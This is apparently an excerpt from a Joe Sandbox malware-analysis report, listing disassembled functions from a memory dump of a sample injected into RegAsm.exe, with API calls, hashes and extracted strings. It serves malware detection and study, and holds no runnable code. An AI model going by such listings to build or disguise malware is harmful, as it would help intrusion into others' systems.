                                                                                                                                                                                                                                          • Instruction ID: 27d6b0f14bdc8df5c149e1c3db57fbdc5afaca3cbefc96f6a2f21912217cf939
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73b47f7bd07e15f5c199576c6bc464965e74fbdd8e6b8335aeaa1fce58ab3641
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55F03CB0C00248EBDF10EFA5C44569DBFB4FB04314F2086AEE865662C1D6799B94CB95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 005013DD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                          • Opcode ID: cb5995437b45c9a39d5c3f3a9a17b3d391dc4d86aa0b610d5a4390aa34024e49
                                                                                                                                                                                                                                          • Instruction ID: e4309a430077ca2301ac788c5d9ed95de07c680818ca4a53bf3ccb11ae0ffce5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb5995437b45c9a39d5c3f3a9a17b3d391dc4d86aa0b610d5a4390aa34024e49
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0E7B0C04249EBCF04EFE5D4456DEBFF4BB54344F1084AED8056B291D379A694CB9A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,0041C3C8,-000A8750,?,0053EE88,0041C3C8,?,0041C3C8,00000000,?,0041A2D6), ref: 0055B48D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 34e944f1193de25cad6c6268fa7f666e1cd852c0fe56dd2940ed258b4c47d558
                                                                                                                                                                                                                                          • Instruction ID: 1c09f8751f9ad0378e2c381b6aa0d22663e0394ab4c576d7e2214ff403ae7fa6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34e944f1193de25cad6c6268fa7f666e1cd852c0fe56dd2940ed258b4c47d558
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE06575505216EAFE3126669C2DB6E3F4EBB817B2F150123BC4596192DB60DC0981E0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 00501E4D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                          • Opcode ID: 11c71bd430bed80597032d535f2504edd484d154af6bf423e8ce30eb3c89037f
                                                                                                                                                                                                                                          • Instruction ID: 3eb913b760bc332b54e8e0fb82937bd3ff1ebc7fdf8090ac0379c16e0dc04c0c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11c71bd430bed80597032d535f2504edd484d154af6bf423e8ce30eb3c89037f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93F03CB4C04209EBDF04EFA4C4456EEBFB8BB04344F1084AED80526281D3759684CB9A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0051CE70: SetLastError.KERNEL32(000005B6), ref: 0051CF1F
                                                                                                                                                                                                                                          • boost::exception::~exception.LIBCPMTD ref: 0051D0F4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastboost::exception::~exception
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2030483509-0
                                                                                                                                                                                                                                          • Opcode ID: 127a9da44362022521f033e18a0ae39a28386dc14d0daf764fa44cf252a51278
                                                                                                                                                                                                                                          • Instruction ID: 9d65acf10fa5897c4cb51372974a7a7b872250a04e27f6b01d4dc6cbf0bd463c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 127a9da44362022521f033e18a0ae39a28386dc14d0daf764fa44cf252a51278
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10F08C75840649EBCB04EF84D942BAEBF78FB44B20F10472CF426636D0DB352A00CB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,0050C6A6,0050CCEF,0000002E,00000000,?,0050CCEF), ref: 0050C660
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213498283-0
                                                                                                                                                                                                                                          • Opcode ID: e0a00663e9917bfe8e8533278bc9554091e04477d1fbdc4f7316dc4c04211636
                                                                                                                                                                                                                                          • Instruction ID: dd8f41f4e9f27020e8a2b087f4928897653eaeb815a31aef6cf1a2e453e85e8b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0a00663e9917bfe8e8533278bc9554091e04477d1fbdc4f7316dc4c04211636
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4F01C30A08248EBCB20CBA8C54046D7FF5AB4A301B24469AE80597241D632DF00AB80
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesExW.KERNEL32(00440315,00000000,?), ref: 0054099D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 005409A7
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00440315,?), ref: 005409BE
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 005409C9
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 005409D5
                                                                                                                                                                                                                                          • ___std_fs_open_handle@16.LIBCPMT ref: 00540A8E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2340820627-0
                                                                                                                                                                                                                                          • Opcode ID: d42f15c2a6db202036fe90f2e2bfb0e91550acdf50c4596346993b15bfd7011d
                                                                                                                                                                                                                                          • Instruction ID: d438b49d91ebf40d0e8e65f5be02901b8155060303c3cbee24098b5dc06c8deb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d42f15c2a6db202036fe90f2e2bfb0e91550acdf50c4596346993b15bfd7011d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0719B74A00619AFDB60CF28C888BEEBBB8FF15328F245695E954E32C1DB709D44CB51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0042CE3E
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0042CEC0
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0042CFCE
                                                                                                                                                                                                                                            • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,00000000,eks,?), ref: 0042D3B5
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0042D23D
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0042D537
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv$ExclusiveLock$AcquireRelease$ByteCharConditionMultiVariableWakeWide
                                                                                                                                                                                                                                          • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 2311560058-388657971
                                                                                                                                                                                                                                          • Opcode ID: 5cf202f8e67c7da8d9daed08b3b257a6e9f560406cf20015c131f7c2467b6a86
                                                                                                                                                                                                                                          • Instruction ID: 656ff1fafc0402bd15cf97b20929c59a3b500642dc8d12530b5c4c7dbac2176f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cf202f8e67c7da8d9daed08b3b257a6e9f560406cf20015c131f7c2467b6a86
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48324A74E002289FEB24DF64DC55BEEBBB1BB88304F1081A9E909A7381D7746E85CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00424313
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00424358
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 004244C9
                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,00000085,00000000,00000007,00000000,?,0000AA7A,00000000), ref: 004244EF
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00424542
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv$CloseOpen
                                                                                                                                                                                                                                          • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 2588155767-388657971
                                                                                                                                                                                                                                          • Opcode ID: d54ed6e59801b497854ceb0a52a8a09c8a816cf6ad6ecfae637070fcfd0a4fc5
                                                                                                                                                                                                                                          • Instruction ID: 491dfe973cfee1e3c9ef4379c42601739974c236a8ee3e86afb2c1e71b1db1af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d54ed6e59801b497854ceb0a52a8a09c8a816cf6ad6ecfae637070fcfd0a4fc5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99C14A70E04218AFDB14CFA4DC91BAEBBB5FF89304F14809AE509A7391DB386A45CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00421403
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00421448
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 004215B9
                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,00000085,00000000,00000007,00000000,?,0000AA7A,00000000), ref: 004215DF
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00421632
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv$CloseOpen
                                                                                                                                                                                                                                          • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 2588155767-388657971
                                                                                                                                                                                                                                          • Opcode ID: 90f2cce5a871e8957ab653f398eb021dd321b8770b3ca6ae1ebc5dfb0708e7fa
                                                                                                                                                                                                                                          • Instruction ID: 445fe49cdeaca878d9e7818506fae736db94ce0e42e47b148ad41fdb42a36499
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90f2cce5a871e8957ab653f398eb021dd321b8770b3ca6ae1ebc5dfb0708e7fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EC17C70E04218AFDB14CFA4DC95BAEBBB5BF98304F14809AE409B7391DB346A45CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00442204
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,00000085,00000000,00000007,00000000,0000AA7A,00000000), ref: 0044222A
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000AA7A,00000000), ref: 004423EE
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000AA7A,00000000), ref: 004426C4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast__aulldiv$AllocGlobal
                                                                                                                                                                                                                                          • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 2907542317-388657971
                                                                                                                                                                                                                                          • Opcode ID: 556c2f285755703d5c9aa74c8e74b21004e211ec889bfb1bc59f4dba5893a372
                                                                                                                                                                                                                                          • Instruction ID: 9f84a0050f59e8236fd2ba38f95f3d1390ff4bc6d5cb27f74b57c34b6ddbe6ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 556c2f285755703d5c9aa74c8e74b21004e211ec889bfb1bc59f4dba5893a372
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6126CB0E002189FEB24CFA4CD51BEEBBB5BB48304F1481AAE509A7381D7785E85CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Offset
                                                                                                                                                                                                                                          • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                          • API String ID: 1587990502-2956939130
                                                                                                                                                                                                                                          • Opcode ID: 20f3693d08572e597083f22b303d3ab7abb4cb9912c833fe1fd9c5369746976c
                                                                                                                                                                                                                                          • Instruction ID: 975de1d90ee75d9ecaa86030a501d587ede8577b15ad686d0425f08efe5c4ed0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20f3693d08572e597083f22b303d3ab7abb4cb9912c833fe1fd9c5369746976c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41510972A04209ABCB14DF68DC499BABFA5FF89324F048669ED1597241EB31FD14C7A0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00561B72,00000002,00000000,?,?,?,00561B72,?,00000000), ref: 005618F9
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00561B72,00000002,00000000,?,?,?,00561B72,?,00000000), ref: 00561922
                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,00561B72,?,00000000), ref: 00561937
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                          • Opcode ID: c2ab0fff28f4a76f52ff4344313262480a5841cb279491b13e57ae138434488c
                                                                                                                                                                                                                                          • Instruction ID: 40d7558f0b0175fc942c61baf373a59243dbf15b6e24df5cd838e8e648014c1c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2ab0fff28f4a76f52ff4344313262480a5841cb279491b13e57ae138434488c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE218622A00905AAEB348F64C911AB77EB7BF60F50B5E8424E94ADB201EB32DD41D358
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0042D702
                                                                                                                                                                                                                                            • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0042D900
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3732870572-0
                                                                                                                                                                                                                                          • Opcode ID: 96229af1ec73a132a9f2b956c9a4d879bf3abf79f5ce90cf25ed705133bd5bc4
                                                                                                                                                                                                                                          • Instruction ID: bb14e70ad36b082a0b5e9c8789b4c92799cc7f9f4f447bf921ed53f564aa29e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96229af1ec73a132a9f2b956c9a4d879bf3abf79f5ce90cf25ed705133bd5bc4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB127EB1E00219AFEB24DF64DC51BAEBBB5BF88304F1481A9F809A7381DB346D448F55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00561B44
                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00561B82
                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00561B95
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00561BDD
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00561BF8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 415426439-0
                                                                                                                                                                                                                                          • Opcode ID: ca024633b9754248d0d0cfe8ded1d1c962b50105e441bf64056eb0b1e61b4ea5
                                                                                                                                                                                                                                          • Instruction ID: 9d7a95eafc06635e98c18416b46754a86e572d1fc1e9b3110dad2ce25cbd1492
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca024633b9754248d0d0cfe8ded1d1c962b50105e441bf64056eb0b1e61b4ea5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D519471A00A069FEB10DFA5CC45BBE7BB8FF44700F184469E915E7291EBB09D44CB65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00441791
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake__aulldiv
                                                                                                                                                                                                                                          • String ID: ^)<$eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 2808616827-1691098573
                                                                                                                                                                                                                                          • Opcode ID: 723989c750d8c448b757ed57353dbe1d082044221ca97999f286e016c4428ad5
                                                                                                                                                                                                                                          • Instruction ID: 61ddee64e97e81d89b636c2aae87605fd75d4fc85ae8e501c6fc247a7cddca84
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 723989c750d8c448b757ed57353dbe1d082044221ca97999f286e016c4428ad5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88E16670D002589FDF14DFA9D881BEEBBB1BF89304F1481AAE409A7351DB346A85CF65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,00556E86,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00561186
                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00556E86,?,?,?,00000055,?,-00000050,?,?), ref: 005611BD
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00561320
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                          • API String ID: 607553120-905460609
                                                                                                                                                                                                                                          • Opcode ID: 125a8fdb11863665becb5fb8a9e623b02eeda480228334a53646febdf7755d45
                                                                                                                                                                                                                                          • Instruction ID: c229f9fa798894be58daefa86f0deebb0b3adf3289c2bac1009a216d3c08dae4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 125a8fdb11863665becb5fb8a9e623b02eeda480228334a53646febdf7755d45
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B715A71A00B07AADB24AB75CC4ABBB7FA8FF45700F18452AF905DB181EB70D944D758
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7505400ce6ba04d7e6a24cd4f4b2d4ed70d869f0fa5c6f3eb332725e7596dd30
                                                                                                                                                                                                                                          • Instruction ID: 98593d961832b577bb604902065ba2b3044358f249b4719abe734af665d25c4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7505400ce6ba04d7e6a24cd4f4b2d4ed70d869f0fa5c6f3eb332725e7596dd30
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84025F75E006199BDF14CFA8D8906ADFBF1FF48315F14816AE919E7380D731AA45CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0042114D
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
